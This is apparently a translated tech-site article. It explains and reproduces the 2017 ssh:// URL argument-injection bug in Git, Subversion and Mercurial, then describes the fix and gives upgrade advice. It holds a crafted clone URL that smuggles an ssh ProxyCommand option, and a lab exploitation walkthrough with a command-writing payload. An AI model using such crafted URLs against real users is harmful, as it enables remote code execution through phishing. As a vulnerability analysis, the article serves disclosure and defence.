2025-01-24 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article walks through an example analysis of the command execution vulnerability triggered by malicious SSH links. Many readers may not be familiar with it, so it is shared here for reference.
I. Vulnerability overview
Some time ago, three mainstream source version control systems, Git, Subversion (svn), and Mercurial, released patches to fix a client-side code execution vulnerability. An attacker could send a crafted ssh:// URL to the victim which, when accessed, triggers the vulnerability and leads to malicious code execution. The vulnerability was discovered and reported by Brian Neel of GitLab, Joern Schneeweisz of Recurity Labs, and Jeff King of GitHub. Details are as follows:
CVE identifiers:
Git: CVE-2017-1000117
Apache Subversion: CVE-2017-9800
Mercurial: CVE-2017-1000116
The attacker sends the victim a crafted URL of the form "ssh://…"; if the victim accesses it, malicious commands execute on the client, giving the attacker host privileges.
Exploitation conditions and method: social engineering combined with remote phishing
Vulnerability Impact Scope:
Git:
Git args,
Then the ssh_host part of the URL is extracted and concatenated with the path.
Finally, the start_command function is called to execute the command.
start_command is defined in git/run-command.c
int start_command(struct child_process *cmd)
The cmd parameter passed in is processed and assigned to argv:
The command is then executed. In this case the command being run is "/usr/bin/ssh `ssh_host` path", and some options passed through the -o argument of the ssh command can themselves execute commands:
For example:
ssh -oProxyCommand=gnome-calculator xxx
The GNOME calculator will be opened locally.
So if we specify the connection as:
git clone ssh://-oProxyCommand=gnome-calculator/cert
The same command execution effect will be achieved.
III. Exploiting the vulnerability
The project prepared for this exercise in the lab environment is at the following address:
http://172.16.12.2:8080/root/CVE-2017-1000117
The predefined command included in the project is stored in CVE-2017-1000117/payload: id > /var/www/html/vuls
To check the local Git version, use the git --version command:
As we can see above, the local Git version is not up to date, so this vulnerability may be present.
To verify whether the payload executes successfully, we must make sure that the directory /var/www/html used in the payload exists locally. If it does not, create it first (mkdir /var/www/html). This directory is only used for verifying the vulnerability:
Then we run the following command to clone the project (in a real exploitation scenario, the victim would typically be tricked into doing this through social engineering):
git clone --recurse-submodules "http://172.16.12.2:8080/root/CVE-2017-1000117.git"
As shown in the above figure, there may be errors, but it does not affect the download of the project and the execution of malicious commands:
We use ls -al CVE-2017-1000117 to see where the project was downloaded:
As can be seen above, the project was successfully downloaded.
So, is the predefined command id > /var/www/html/vuls executed in the project? We use ls -al /var/www/html/vuls command to verify whether the file is generated:
As above, the file was successfully generated.
Use the cat command to view the file and see the results of the command execution:
As you can see above, the predefined commands in the project were successfully executed.
IV. Fix
The Git project has fixed the vulnerability. In the v2.14.1 commit, you can see that ssh_host is validated in the git_connect function before execution:
The validation is performed by this newly added function:
This function checks the first character of ssh_host to prevent a leading "-" from passing arguments to ssh.
The same function is also used in many other places to filter the incoming host and port.
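The leading-dash check described above, as an added C example (not Git's own code): it splits an ssh:// URL into host and port and rejects either one if ssh would parse it as an option. The names check_ssh_url, copy_part and looks_like_option are hypothetical, the first sample URL is constructed, and the parsing is simplified (no IPv6 brackets).

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: ssh would parse a word starting with '-' as an option. */
static int looks_like_option(const char *s)
{
    return s[0] == '-';
}

/* Copy [start, end) into buf; fail if it does not fit. */
static int copy_part(char *buf, size_t len, const char *start, const char *end)
{
    size_t n = (size_t)(end - start);
    if (n >= len)
        return -1;
    memcpy(buf, start, n);
    buf[n] = '\0';
    return 0;
}

/* Split "ssh://host[:port]/path" and decide whether host and port may go on
 * an ssh command line. Returns 0 if acceptable, -1 to reject.
 * Simplified: "user@" stays part of the host word. */
int check_ssh_url(const char *url, char *host, size_t hlen,
                  char *port, size_t plen)
{
    const char *auth, *end, *colon = NULL, *p;
    host[0] = port[0] = '\0';
    if (strncmp(url, "ssh://", 6) != 0)
        return -1;
    auth = url + 6;
    end = auth + strcspn(auth, "/");
    for (p = auth; p < end; p++)      /* last ':' starts the port */
        if (*p == ':')
            colon = p;
    if (copy_part(host, hlen, auth, colon ? colon : end) < 0 || !host[0])
        return -1;
    if (colon && copy_part(port, plen, colon + 1, end) < 0)
        return -1;
    return (looks_like_option(host) || looks_like_option(port)) ? -1 : 0;
}

int main(void)
{
    char h[256], p[16];
    /* First URL is constructed; the second is the one from the article. */
    printf("%d\n", check_ssh_url("ssh://git@example.com:2222/repo.git", h, sizeof h, p, sizeof p));
    printf("%d\n", check_ssh_url("ssh://-oProxyCommand=gnome-calculator/cert", h, sizeof h, p, sizeof p));
}
```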
Users only need to check whether they are using the affected version, and if so, upgrade Git.
Remediation recommendations
Git: Upgrade to Git v2.14.1
Apache Subversion: Upgrade to Subversion 1.8.19, Subversion 1.9.7
Mercurial: Upgrade to Mercurial 4.3 and 4.2.3